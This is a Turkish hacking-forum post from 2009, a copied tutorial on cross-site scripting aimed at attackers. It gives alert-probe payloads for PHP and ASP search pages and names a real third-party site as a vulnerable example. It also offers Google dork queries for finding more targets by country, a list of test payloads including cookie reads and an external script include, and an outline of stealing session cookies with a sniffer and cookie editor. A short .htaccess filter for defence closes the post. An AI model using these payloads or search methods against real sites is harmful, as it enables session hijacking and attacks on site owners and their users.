ForumTayfa  

Go Back   ForumTayfa > Güvenlik & Bilgisayar & İnternet & Webmaster & Programlama Bölümü > Güvenlik & Bilgisayar & İnternet & Webmaster & Programlama > Güvenlik ve Güvenlik Açıkları

Güvenlik ve Güvenlik Açıkları Pc güvenliği ile ilgili tüm konuların tartışıldığı bölüm...

Yeni Konu aç  Cevapla
 
LinkBack Seçenekler Stil
Alt 01.03.09, 13:46   #1 (permalink)
zBi
Yeni Tayfa
 
zBi - ait Kullanıcı Resmi (Avatar)
 
Üyelik Tarihi: Jan 2009
Nereden: İstanbul İçecek: RedBull Sigara: Uzun Parliament Racon: Eyvallah Yaş: 19
Mesaj Sayısı: 178
Konu Sayısı: 33
Takım: Beşiktaş
Rep Gücü: 21877
Rep Puanı: 2186533
Rep Derecesi : zBi 0-3000000zBi 0-3000000zBi 0-3000000zBi 0-3000000zBi 0-3000000zBi 0-3000000zBi 0-3000000zBi 0-3000000zBi 0-3000000zBi 0-3000000zBi 0-3000000
Ruh Hali:

Exclamation XSS Açıkları (Döküman , Programlar ve Araçlar)




Ele alacağımız başlıklar;

# XSS ( Cross Site Scripting ) Nedir.

# XSS açığının işleyişi nasıldır.

# Açık sitenin hangi kısımlarında bulunur.

# Açığın bulunması ve uygulanması.

# Test Kodları.

# Cookie çalma.

# Açıktan nasıl korunabiliriz.

,,



* XSS ( Cross Site Scripting ) Nedir;

Web uygulamalarının neden olduğu açıklardan biri olan "XSS" asıl adı "Cross Site Scripting" scriptlerin yazılmaya başlanmasından sonra ortaya çıkan çok eski bir açıktır.Açık eski olmasına rağmen günümüzde birçok web sitesinde mevcuttur.


* XSS açığının işleyişi nasıldır;

Web Scriptlerinin yazılımının sebebiyet verdiği bu açığın işleyişi,açığı kullanmak isteyen kişinin hazırlamış olduğu kodları kendi hazırlamış olduğu sayfalara ekliyerek, bilgilerini ele geçirmek istediği kişiye bir şekilde iletmesidir.Bu olaylar esnasında kurban hernekadar sadece bir linke veya bir sayfaya girmiş olduğunu düşünsede kişi kendi elleriyle bilgilerinin
karşı tarafa gitmesine neden olmaktadır.


* Açık sitenin hangi kısımlarında bulunur;

Açık genellikler POST ve GET metodlarının kullanıldığı bölümlerde görülür fakat,açığın gerek anasayfada gerekse arka planda yazılımdan kaynaklanan hata nedeniyle bulunması kaçınılmazdır.

Özellikle sitelerin Arama kısımlarında bulunan açığı galeri,mesajlar,haberler,yorumlar vs.. bölümlerinde'de görebiliriz.


* Açığın bulunması ve uygulanması;

Verilen maddelere uygun olması nedeniyle konunun bu kısmınada değinelim,

Yukarda genellikle arama kısımlarında bulunur diye bahsetmiştik, karşıdaki sitenin php veya asp oldugu düşünüp açıkla alakalı uygulama yapalım.

Php bir site için uygulacağımız alert verdirme kodu,yani sitede xss açığının bulunduğuna kanaat getireceğimiz kodların bir kaçından bahsedip aşağıda uygulamalarından detaylı bir şekilde bahsedeceğim.

Hedef sitemiz php ise;

Kod:
<script>alert("GrayHatZ")</script>
Hedef sitemiz asp ise;

Kod:
"><script>alert("GrayHatZ")</script>
örnek; http://www.hedefsite.com/arama.php?=<script>alert("GrayHatZ")</script>

örnek; http://www.hedefsite.com/arama.asp?="><script>alert("GrayHatZ")</script>

Yukarda verilen örneklerde yazmış olduğumuz alert verdirme kodları hedef siteye uygulandığı takdirde sonuç alıp alert verdirilirse bu hedes sitemizde XSS açığının mevcut olduğunu gösterir.Yukarda vermiş olduğum alert verdirme kodlarına aşağıda kapsamlı olarak değinilecektir.

XSS'yi henüz yeni öğrenen kişilerin alert nedir dememeleri için konuyla alakalı bir örnek vereyim;

ilgili site: http://www.europa-eu-un.org/home/articleslist.asp?="><script>alert("GrayHatZ")</script>

Ekran görüntüsü;




Hedef siteye yönelik bir uygulama ise verecegim kodları sitede bahsetmiş oldugum noktalarda denemelisiniz.Amacınız ilgili açıkla alakalı daha fazla site bulmak ise güzel bir yol paylaşayım;

Google aramalarımızı şu şekilde genişletebiliriz:

inurl:searc.asp , inurl:search.php , inurl:arama.asp veya php

veya aramamızı biraz daha genişletiyoruz;

inurl:search.asp inurl:tr ( arama yapmak istedigimiz ülkenin domain uzantısını belirtirseniz o ülkeye yönelik arama sonuçlarına ulaşabilirsiniz )

Yukarda belirtmiş oldugum search.php veya search.asp veya arama.php sizin insifiyatifiniz doğrultusunda değişebilir, aramalarınızı, ( index,anasayfa,haber,galeri,mesaj,.. ) bu şekilde genişletebilirsiniz.

işin bu kısmınıda geçtik ben manuel arama yapmak yerine program kullanmak istiyorum diyorsanız aşağıdaki vereceğim programı kullanabilirsiniz.

Türkçe dahil olmak üzere 4 dilde hazırlanmış bir XSS scanner;

[Sadece Kayıtlı Kullanıcılar Linkleri Görebilir.Kayıt Olmak İçin Tıklayınız...]


* Test Kodları;

Kod:
1- "><script>alert(1)</script> 
2- "><script>alert(document.cookie)</script> 
3- ');alert('own');// 
4- "><script/src=http://site.com/xss.js></script> 
5- <body onLoad="while(true) alert('XSS');">
6- <scrscriptipt>alert(1)</scrscriptipt>
7- <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
8- <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
Test Kodlarının daha fazlasına, [Sadece Kayıtlı Kullanıcılar Linkleri Görebilir.Kayıt Olmak İçin Tıklayınız...]

* Cookie çalma;

Cookie kişinin giriş yapmış olduğu sitedeki bilgilerinin bir yolla alınıp,(bu kişinin hazırlamış olduğu düzeneğe bağlıdır)kendi cookieleri ile değişip karşıdaki kişinin yerine siteye girme işleminin tamamıdır.Karşıdakini cookie bilgilerini almak isteyen kişi hazırlamış oldugu bir websayfasına hazırlamış olduğu bir link sayesine girilmesini sağlayıp karşıdakinin bilgilerini alması durumunda mevcut 2 düzeneğe ihtiyacı vardır;

1-Bir web siteye kurulmuş sniffer.[Sadece Kayıtlı Kullanıcılar Linkleri Görebilir.Kayıt Olmak İçin Tıklayınız...]
2-Cookie Editör. [Sadece Kayıtlı Kullanıcılar Linkleri Görebilir.Kayıt Olmak İçin Tıklayınız...]

Sniffer kullanımını bu konunun daha fazla karışmaması için daha fazla değinmiyorum.


* Açıktan nasıl korunabiliriz;

XSS açıklarından korunmanın birkaç yolu mevcuttur içlerinden en basitini paylaşmak istiyorum,

".htaccess" ile Korunma;

".htaccess" dosyasının yapılandırılmasıyla XSS açığından korunmak mevcuttur.Aşağıda vereceğim kodları sitenizin kök dizininde bulunan veya scriptinizin bulunduğu dizindeki ".htaccess" dosyasına ekleyin.Bu sayede yapılan bir XSS saldırısında site hata sayfası verip erişimi engelliyecektir.

Kod:
RewriteEngine On 
 
RewriteCond %{QUERY_******} base64_encode.*\(.*\) [OR] 
 
RewriteCond %{QUERY_******} (\<|%3C).*script.*(\>|%3E) [NC,OR] 
 
RewriteCond %{QUERY_******} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] 
 
RewriteCond %{QUERY_******} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) 
 
RewriteRule ^(.*)$ index.php [F,L] 


Alıntıdır, Döküman BlueMax tarafından hazırlanmıştır.



Konu zBi tarafından (01.03.09 Saat 13:49 ) değiştirilmiştir.
zBi isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Cevapla


Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık


Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
PHP'de RFI/LFI Açıkları ve Korunma Yolları ShıFтdєLєтє ASP, Perl, Php, Html 0 24.12.08 23:39
Sistem Açıkları Ve Kapatılması_ Süper Bir döküman -BuRAk- Güvenlik ve Güvenlik Açıkları 0 30.11.08 20:52
Buyrun Xtrap Hatasını %100 kaldıran programsız bir Döküman NeoJima Knight Online Genel 18 17.02.08 20:11
Yeni Başlayanlar İçin Yararlı Bir Döküman... mertce18 Güvenlik ve Güvenlik Açıkları 1 19.05.07 15:43


Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 15:52.


Powered by vBulletin® Version 3.8.0
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.6.0
User Alert System provided by Advanced User Tagging v3.0.6 (Lite) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
ForumTayfa

Arşiv: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 16 22 23 24 25 26 27 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 95 96 97 98 99 100 102 103 104 105 106 155 156 157 158 159 160 161 162 163 164 167 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271


ForumTayfa - Link Değişimi
Telinka İletişim | Voip Ürünleri | Link Değişimine Katılın |

Sitemiz bir forum sitesi olduğundan dolayı, kullanıcılar her türlü görüşlerini önceden onay olmadan anında siteye yazabilmektedir. ForumTayfa Yöneticileri mesajları itina ile kontrol etse de, bu yazılardan dolayı doğabilecek her türlü sorumluluk yazan kullanıcılara aittir. Yine de sitemizde yasalara aykırı unsurlar bulursanız [email protected] email adresine bildirebilirsiniz, şikayetiniz incelendikten sonra en kısa sürede gereken yapılacaktır.

Any member of our web site has the right of adding comments instantly without getting permisson due to the forum structure of our site basis. Althought, our site modarators check comments with care, all the responsibilities sourced from these comments directly belong to the members. If you still find any illegal content in our site ( A.buse, H.arassment, S.camming, H.acking, W.arez, C.rack, D.ivx, Mp.3 or any Illegal Activity ), please report us via [email protected] .Your reports will be evaluated as soon as the arrival of your e-mail.